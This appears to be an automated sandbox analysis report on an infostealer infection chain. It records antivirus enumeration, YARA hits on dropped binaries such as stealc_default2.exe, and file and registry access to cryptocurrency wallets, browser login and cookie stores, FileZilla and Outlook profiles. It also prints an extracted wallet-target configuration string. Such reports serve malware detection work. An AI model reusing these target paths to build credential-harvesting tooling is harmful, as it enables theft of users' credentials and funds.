Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct

Stealing of Sensitive Information

Source: Yara match File source: 18.0.Nework.exe.930000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.0.Hkbsse.exe.5a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.Hkbsse.exe.5a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.Hkbsse.exe.5a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.Nework.exe.930000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.axplong.exe.200000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.axplong.exe.200000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.axplong.exe.200000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.0.Hkbsse.exe.5a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.b50000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000013.00000002.2831867079.00000000005A1000.00000020.00000001.01000000.00000011.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2262892966.0000000000201000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.2725148895.0000000004A00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.2222614082.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000000.2831681821.00000000005A1000.00000020.00000001.01000000.00000011.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.2187029054.0000000005370000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000000.2830209557.00000000005A1000.00000020.00000001.01000000.00000011.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.2833629275.00000000005A1000.00000020.00000001.01000000.00000011.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.2276396651.0000000000201000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2227686049.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000000.2818707390.0000000000931000.00000020.00000001.01000000.00000010.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.3514768739.0000000000201000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.2235626454.0000000004C10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.2832307218.0000000000931000.00000020.00000001.01000000.00000010.sdmp, type: MEMORY
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\Nework[1].exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe, type: DROPPED
Source: Yara match File source: 00000018.00000002.3021996080.0000000003129000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: stealc_default2.exe PID: 3488, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: svchost015.exe PID: 5268, type: MEMORYSTR
Source: Yara match File source: 25.0.penis.exe.ac0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000019.00000000.2952756193.0000000000AC2000.00000002.00000001.01000000.00000014.sdmp, type: MEMORY
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\penis[1].exe, type: DROPPED
Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: 31.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 34.0.newbundle2.exe.30000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.2.crypted.exe.38a5570.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.RegAsm.exe.436080.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.gold.exe.4165570.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.RegAsm.exe.436080.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.0.VCIo8iTrPf.exe.ff0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.gold.exe.4165570.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000011.00000000.2808170295.0000000000FF2000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000000.3039915900.0000000000051000.00000002.00000001.01000000.0000001D.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000002.3027013594.00000000038C5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.2809221317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.3514615123.0000000000421000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.3187193053.0000000000423000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2764953143.0000000004165000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: gold.exe PID: 4892, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RegAsm.exe PID: 2720, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RegAsm.exe PID: 6696, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: VCIo8iTrPf.exe PID: 5984, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: penis.exe PID: 6200, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: crypted.exe PID: 3792, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RegAsm.exe PID: 4816, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Roaming\VCIo8iTrPf.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\newbundle2[1].exe, type: DROPPED
Source: Yara match File source: 24.2.needmoney.exe.3710000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.2.needmoney.exe.3740000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.2.stealc_default2.exe.930000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.2.needmoney.exe.3710000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.2.needmoney.exe.3740000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.2.needmoney.exe.30fa4b9.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.2.needmoney.exe.30fa4b9.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.0.stealc_default2.exe.930000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000029.00000003.3171679360.0000000005390000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000002.3070584798.000000000101E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.3031467583.0000000003740000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000000.2849048856.0000000000931000.00000080.00000001.01000000.00000012.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000002.3376541999.0000000000BFE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000002.3065909202.0000000000931000.00000080.00000001.01000000.00000012.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.3030940765.0000000003710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.3021996080.0000000002E20000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: stealc_default2.exe PID: 3488, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: svchost015.exe PID: 5268, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\stealc_default2[1].exe, type: DROPPED
Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: Process Memory Space: stealc_default2.exe PID: 3488, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: svchost015.exe PID: 5268, type: MEMORYSTR
Source: Yara match File source: 38.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.2.rstxdhuj.exe.38efdb0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.2.rstxdhuj.exe.38a1590.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000023.00000002.3231251960.00000000038A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000002.3116851630.0000000002971000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000002.3514611255.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 25.0.penis.exe.ac0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\penis[1].exe, type: DROPPED
Source: VCIo8iTrPf.exe, 00000011.00000002.3014501020.0000000003257000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: ElectrumE#
Source: stealc_default2.exe, 00000017.00000002.3070584798.0000000001081000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\ElectronCash\wallets\*.*O]
Source: stealc_default2.exe, 00000017.00000002.3070584798.0000000001010000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: VCIo8iTrPf.exe, 00000011.00000002.3014501020.0000000003257000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: JaxxE#
Source: stealc_default2.exe, 00000017.00000002.3070584798.0000000001081000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: C:\Users\user\AppData\Roaming\\Exodus\\window-state.json
Source: stealc_default2.exe, 00000017.00000002.3070584798.0000000001081000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\passphrase.json
Source: VCIo8iTrPf.exe, 00000011.00000002.3014501020.0000000003257000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: ExodusE#
Source: stealc_default2.exe, 00000017.00000002.3070584798.0000000001081000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Binance\.finger-print.fp.B
Source: VCIo8iTrPf.exe, 00000011.00000002.3014501020.0000000003257000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: EthereumE#
Source: stealc_default2.exe, 00000017.00000002.3070584798.0000000001081000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: C:\Users\user\AppData\Roaming\\Coinomi\Coinomi\wallets\\*.*\]
Source: stealc_default2.exe, 00000017.00000002.3070584798.0000000001081000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: C:\Users\user\AppData\Roaming\\MultiDoge\\multidoge.wallet
Source: stealc_default2.exe, 00000017.00000002.3070584798.0000000001081000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\*.*
Source: stealc_default2.exe, 00000017.00000002.3070584798.0000000001081000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\*.*
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite-wal
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\prefs.js
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite-shm
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite-wal
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History-journal
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite-shm
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
Source: C:\Users\user\AppData\Roaming\VCIo8iTrPf.exe File opened: C:\Users\user\AppData\Roaming\atomic\
Source: C:\Users\user\AppData\Roaming\VCIo8iTrPf.exe File opened: C:\Users\user\AppData\Roaming\Binance\
Source: C:\Users\user\AppData\Roaming\VCIo8iTrPf.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\Cache\
Source: C:\Users\user\AppData\Roaming\VCIo8iTrPf.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\db\
Source: C:\Users\user\AppData\Roaming\VCIo8iTrPf.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
Source: C:\Users\user\AppData\Roaming\VCIo8iTrPf.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Users\user\AppData\Roaming\VCIo8iTrPf.exe File opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\
Source: C:\Users\user\AppData\Roaming\VCIo8iTrPf.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\AppData\Roaming\VCIo8iTrPf.exe File opened: C:\Users\user\AppData\Roaming\Exodus\
Source: C:\Users\user\AppData\Roaming\VCIo8iTrPf.exe File opened: C:\Users\user\AppData\Roaming\Guarda\
Source: C:\Users\user\AppData\Roaming\VCIo8iTrPf.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe File opened: C:\Users\user\AppData\Roaming\Exodus\
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe File opened: C:\Users\user\AppData\Roaming\MultiDoge\
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe File opened: C:\Users\user\AppData\Roaming\Binance\
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe File opened: C:\Users\user\AppData\Roaming\Exodus\
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe File opened: C:\Users\user\AppData\Roaming\MultiDoge\
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe File opened: C:\Users\user\AppData\Roaming\Binance\
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\atomic\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Binance\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\Cache\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\db\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Exodus\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Guarda\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe File opened: C:\Users\user\AppData\Roaming\atomic\
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe File opened: C:\Users\user\AppData\Roaming\Binance\
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\Cache\
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\db\
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe File opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe File opened: C:\Users\user\AppData\Roaming\Exodus\
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe File opened: C:\Users\user\AppData\Roaming\Guarda\
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
